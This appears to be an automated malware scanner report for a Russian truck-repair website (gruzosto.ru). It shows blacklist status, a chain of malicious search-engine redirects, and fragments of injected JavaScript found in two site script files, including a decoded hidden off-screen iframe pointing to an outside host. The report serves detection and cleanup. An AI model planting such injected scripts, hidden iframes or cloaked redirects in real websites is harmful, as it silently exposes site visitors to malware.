Malware Scanner report for gruzosto.ru

Malicious/Suspicious/Total URLs checked
2/0/15
2 pages have malicious code. See details below.
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "gruzosto.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious redirects
Found
The website redirects visitors arriving from search engines to a third-party URL. The chain of malicious redirects found:
->http://t87e.gu.ma/
638 websites infected.
->http://weras.isasecret.com
5 websites infected.

The website "gruzosto.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=gruzosto.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gruzosto.ru/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.

Malicious/Suspicious Redirects

Request | Server response | Status
URL: http://gruzosto.ru/
(imitation of visitor from search engine)


GET / HTTP/1.1
Host: gruzosto.ru
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Thu, 25 Sep 2014 18:17:26 GMT
Location: http://t87e.gu.ma/
Server: nginx
Content-Length: 0
Content-Type: text/html; charset=UTF-8
malicious
URL: http://t87e.gu.ma/
(imitation of visitor from search engine)


GET / HTTP/1.1
Host: t87e.gu.ma
Referer: http://www.google.com/search?q=redirect+check2
HTTP/1.1 301 Found
Connection: close
Date: Thu, 25 Sep 2014 18:14:10 GMT
Location: http://weras.isasecret.com
Server: Apache/2.2.15
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.3.3
malicious

Scanned pages/files

Request | Server response | Status
http://gruzosto.ru/
200 OK
Content-Length: 47410
Content-Type: text/html
clean
http://gruzosto.ru/media/system/js/core.js
200 OK
Content-Length: 6146
Content-Type: text/javascript
clean
http://gruzosto.ru/media/system/js/mootools-core.js
200 OK
Content-Length: 90461
Content-Type: text/javascript
clean
http://gruzosto.ru/media/system/js/caption.js
200 OK
Content-Length: 2721
Content-Type: text/javascript
clean
http://gruzosto.ru/media/system/js/mootools-more.js
200 OK
Content-Length: 240049
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function ddd_prover_ua(){
var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox
... 3172 bytes are skipped ...
‘在同一月份。 ",creditcard:"您輸入的信用卡號碼不正確。當前已輸入{length}個字符。 "});
Form.Validator.add("validate-currency-yuan",{errorMsg:function(){return Form.Validator.getMsg("currencyYuan");},test:function(a){return Form.Validator.getValidator("IsEmpty").test(a)||(/^￥?\-?([1-9]{1}[0-9]{0,2}(\,[0-9]{3})*(\.[0-9]{0,2})?|[1-9]{1}\d*(\.[0-9]{0,2})?|0(\.[0-9]{0,2})?|(\.[0-9]{1,2})?)$/).test(a.get("value"));
}});;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
DrWeb
JS.IFrame.564
Microsoft
Trojan:JS/Iframe.DI

http://gruzosto.ru/plugins/system/helix/js/menu.js
200 OK
Content-Length: 6085
Content-Type: text/javascript
clean
http://gruzosto.ru/plugins/system/helix/js/totop.js
200 OK
Content-Length: 2950
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function ddd_prover_ua(){
var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox
... 1501 bytes are skipped ...
oString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2.1(\'7\',5(){3 0=6.9(\'a\');8(0){3 b=4 c.i(2);0.1(\'h\',5(e){4 g(e).f();b.d()})}});',19,19,'toplink|addEvent|window|var|new|function|document|domready|if|id|topofpage||Fx|toTop||stop|Event|click|Scroll'.split('|'),0,{}));;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Decoded script:


window.addEvent('domready',function(){var toplink=document.id('topofpage');if(toplink){var b=new Fx.Scroll(window);toplink.addEvent('click',function(e){new Event(e).stop();b.toTop()})}});
window.addEvent('domready',function(){var toplink=document.id('topofpage');if(toplink){var b=new Fx.Scroll(window);toplink.addEvent('click',function(e){new Event(e).stop();b.toTop()})}});
<iframe src="http://ehehtafeg.netishyn.org/jtrjffHDAJJF7.html" style="position:absolute;left:-1409px;top:-1409px;" height="170" width="170" name="Achtamar"></iframe>

Antivirus reports:

DrWeb
SCRIPT.Virus

http://gruzosto.ru/modules/mod_slideshow_pro_sp2/assets/js/script.js
200 OK
Content-Length: 8509
Content-Type: text/javascript
clean
http://gruzosto.ru/2012-02-02-11-46-50/remont-dvigatelya.html
200 OK
Content-Length: 25535
Content-Type: text/html
clean
http://gruzosto.ru/2012-02-02-11-46-50/remont-hodovoi-chasti.html
200 OK
Content-Length: 26587
Content-Type: text/html
clean
http://gruzosto.ru/2012-02-02-11-46-50/remont-tormoznoj-sistemy.html
200 OK
Content-Length: 26139
Content-Type: text/html
clean
http://gruzosto.ru/2012-02-02-11-46-50/remont-korobki-peredach.html
200 OK
Content-Length: 27603
Content-Type: text/html
clean
http://gruzosto.ru/2012-02-02-11-46-50/remont-rulevogo-upravleniya.html
200 OK
Content-Length: 24487
Content-Type: text/html
clean
http://gruzosto.ru/2012-02-02-11-46-50/remont-vedushchego-mosta.html
200 OK
Content-Length: 21402
Content-Type: text/html
clean
http://gruzosto.ru/2012-02-02-11-46-50/remont-stsepleniya.html
200 OK
Content-Length: 25064
Content-Type: text/html
clean